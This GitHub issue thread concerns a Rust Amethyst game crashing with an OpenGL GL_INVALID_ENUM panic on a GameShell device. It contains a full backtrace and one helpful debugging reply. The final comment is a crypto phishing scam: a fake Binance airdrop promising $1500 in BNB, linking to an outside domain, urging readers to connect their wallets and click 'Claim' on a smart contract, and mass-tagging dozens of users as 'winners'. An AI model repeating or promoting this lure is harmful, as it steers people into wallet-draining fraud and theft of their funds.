### ISSUE TITLE
Open GL Explodes (Latest)

### ISSUE THREAD

**Issue by o7-machinehum** [Machine-Hum/gameshell_amethyst#4]
```
warning: field is never read: `can_pause`
   --> /home/cpi/cpal/src/host/alsa/mod.rs:511:5
    |
511 |     can_pause: bool,
    |     ^^^^^^^^^^^^^^^
    |
    = note: `#[warn(dead_code)]` on by default
 
    Finished dev [unoptimized + debuginfo] target(s) in 2.12s
     Running `target/debug/amethyst-starter-2d`
[INFO][amethyst_starter_2d] "/home/cpi/gameshell_amethyst/resources/display_config.ron"
[WARN][winit::platform_impl::platform::x11::util::randr] XRandR reported that the display's 0mm in size, which is certifiably insane
[INFO][winit::platform_impl::platform::x11::window] Guessed window scale factor: 1
[INFO][rendy_core::wrap] Slow safety checks are enabled! You can disable them in production by enabling the 'no-slow-safety-checks' feature!
[WARN][rendy_factory::factory] Slow safety checks are enabled! Disable them in production by enabling the 'no-slow-safety-checks' feature!
thread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: InvalidEnum', /home/cpi/.cargo/git/checkouts/gfx-5aa16ebf28522941/c4b75d3/src/backend/gl/src/info.rs:165:21
stack backtrace:
   0: backtrace::backtrace::libunwind::trace
             at /cargo/registry/src/github.com-1ecc6299db9ec823/backtrace-0.3.46/src/backtrace/libunwind.rs:86
   1: backtrace::backtrace::trace_unsynchronized
             at /cargo/registry/src/github.com-1ecc6299db9ec823/backtrace-0.3.46/src/backtrace/mod.rs:66
   2: std::sys_common::backtrace::_print_fmt
             at src/libstd/sys_common/backtrace.rs:78
   3: <std::sys_common::backtrace::_print::DisplayBacktrace as core::fmt::Display>::fmt
             at src/libstd/sys_common/backtrace.rs:59
   4: core::fmt::write
             at src/libcore/fmt/mod.rs:1069
   5: std::io::Write::write_fmt
             at src/libstd/io/mod.rs:1504
   6: std::sys_common::backtrace::_print
             at src/libstd/sys_common/backtrace.rs:62
   7: std::sys_common::backtrace::print
             at src/libstd/sys_common/backtrace.rs:49
   8: std::panicking::default_hook::{{closure}}
             at src/libstd/panicking.rs:198
   9: std::panicking::default_hook
             at src/libstd/panicking.rs:218
  10: std::panicking::rust_panic_with_hook
             at src/libstd/panicking.rs:511
  11: rust_begin_unwind
             at src/libstd/panicking.rs:419
  12: core::panicking::panic_fmt
             at src/libcore/panicking.rs:111
  13: core::option::expect_none_failed
             at src/libcore/option.rs:1268
  14: core::result::Result<T,E>::unwrap
             at /rustc/94d346360da50f159e0dc777dc9bc3c5b6b51a00/src/libcore/result.rs:1005
  15: gfx_backend_gl::info::PlatformName::get
             at /home/cpi/.cargo/git/checkouts/gfx-5aa16ebf28522941/c4b75d3/src/backend/gl/src/info.rs:165
  16: gfx_backend_gl::info::Info::get
             at /home/cpi/.cargo/git/checkouts/gfx-5aa16ebf28522941/c4b75d3/src/backend/gl/src/info.rs:263
  17: gfx_backend_gl::info::query_all
             at /home/cpi/.cargo/git/checkouts/gfx-5aa16ebf28522941/c4b75d3/src/backend/gl/src/info.rs:342
  18: gfx_backend_gl::PhysicalDevice::new_adapter
             at /home/cpi/.cargo/git/checkouts/gfx-5aa16ebf28522941/c4b75d3/src/backend/gl/src/lib.rs:408
  19: <gfx_backend_gl::window::glutin::Surface as gfx_hal::Instance<gfx_backend_gl::Backend>>::enumerate_adapters
             at /home/cpi/.cargo/git/checkouts/gfx-5aa16ebf28522941/c4b75d3/src/backend/gl/src/window/glutin.rs:224
  20: <gfx_backend_gl::Instance as gfx_hal::Instance<gfx_backend_gl::Backend>>::enumerate_adapters
             at /home/cpi/.cargo/git/checkouts/gfx-5aa16ebf28522941/c4b75d3/src/backend/gl/src/lib.rs:755
  21: rendy_factory::factory::init_with_instance_ref
             at /home/cpi/.cargo/git/checkouts/rendy-ab702d4ac969d52a/26ec46d/factory/src/factory.rs:1195
  22: rendy_init::windowed::WindowedRendy<gfx_backend_gl::Backend>::init_gl
             at /home/cpi/.cargo/git/checkouts/rendy-ab702d4ac969d52a/26ec46d/init/src/windowed.rs:300
  23: rendy_init::windowed::WindowedRendy<B>::init::{{closure}}
             at /home/cpi/.cargo/git/checkouts/rendy-ab702d4ac969d52a/26ec46d/init/src/windowed.rs:136
  24: rendy_init::windowed::WindowedRendy<B>::init
             at /home/cpi/.cargo/git/checkouts/rendy-ab702d4ac969d52a/26ec46d/core/src/backend.rs:383
  25: amethyst_rendy::bundle::RenderingBundle<B>::new
             at /home/cpi/.cargo/git/checkouts/amethyst-fedb0a1032a075ce/b5ffae7/amethyst_rendy/src/bundle.rs:61
  26: amethyst_starter_2d::main
             at src/main.rs:33
  27: std::rt::lang_start::{{closure}}
             at /rustc/94d346360da50f159e0dc777dc9bc3c5b6b51a00/src/libstd/rt.rs:67
  28: std::rt::lang_start_internal::{{closure}}
             at src/libstd/rt.rs:52
  29: std::panicking::try::do_call
             at src/libstd/panicking.rs:331
  30: std::panicking::try
             at src/libstd/panicking.rs:274
  31: std::panic::catch_unwind
             at src/libstd/panic.rs:394
  32: std::rt::lang_start_internal
             at src/libstd/rt.rs:51
  33: std::rt::lang_start
             at /rustc/94d346360da50f159e0dc777dc9bc3c5b6b51a00/src/libstd/rt.rs:67
  34: main
  35: __libc_start_main
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
```

**Comment by ghost** [comment]
I've got _some_ but not much opengl knowledge.

It looks like this is failing on calling into the OpenGL function https://www.khronos.org/registry/OpenGL-Refpages/gl4/html/glGetString.xhtml, passing in a constant "VENDOR". The error is "GL_INVALID_ENUM", which indicates that either whatever OpenGL backend is running on the gameshell doesn't support querying this constant, or the glow rust crate somehow got the wrong value for GL_VENDOR.

I can't seem to find any information about when GL_VENDOR was introduced, but I did find a description of this operation at https://www.khronos.org/opengl/wiki/OpenGL_Context#Vendor_string.

It might be worth looking into the minimum supported OpenGL version of gfx, and the corresponding implemented OpenGL version on the gameshell. Maybe using something like glxinfo on linux to get the latter information? I'm not sure.

If you're still investigating this, hope that helps! If not, then that seems like a sane course of action :)

I don't have a gameshell so I can't really investigate further, but even so, digging into this stuff can get pretty nasty and I know one of the possible outcomes is just "X project has a minimum version for Y technology, and short of rewriting it there's no way to get this to work," and that's often discouraged me from looking too deeply into getting this kind of stuff working when it isn't in the past.

**Comment by tim-tepia** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @tomtom215, @HankiGreed, @losman0s, @midnitemarauder, @3lding, @abcijkxyz, @kaichen, @ObiWanKenobi121, @h4tl2, @mogobanyamwaro, @William3Johnson, @gruberdev, @IvonaldoAmaral, @htiennv, @Hussain20112014, @J48DHH, @VersBinarii, @depcorn, @SHOCKALOVe, @iower, @nirtamir2, @developerfitz, @isamyakt, @patrickcurl, @Mainnmw, @7237139812, @jinsankim, @recmo, @AlwaysHacking, @rajikaimal, @rxiong1, @daefresh, @webdev-vignesh, @wuxutao, @subinium, @poorly-redacted, @ffimnsr, @christopherklint97, @githubsands, @dehrom, @terryyy-eth, @Brownson4834, @Trihorus, @ulopong, @bmatheson, @sadityakumar9211, @chinahnzhou, @dk-myc, @bodogbo, @Roffrey
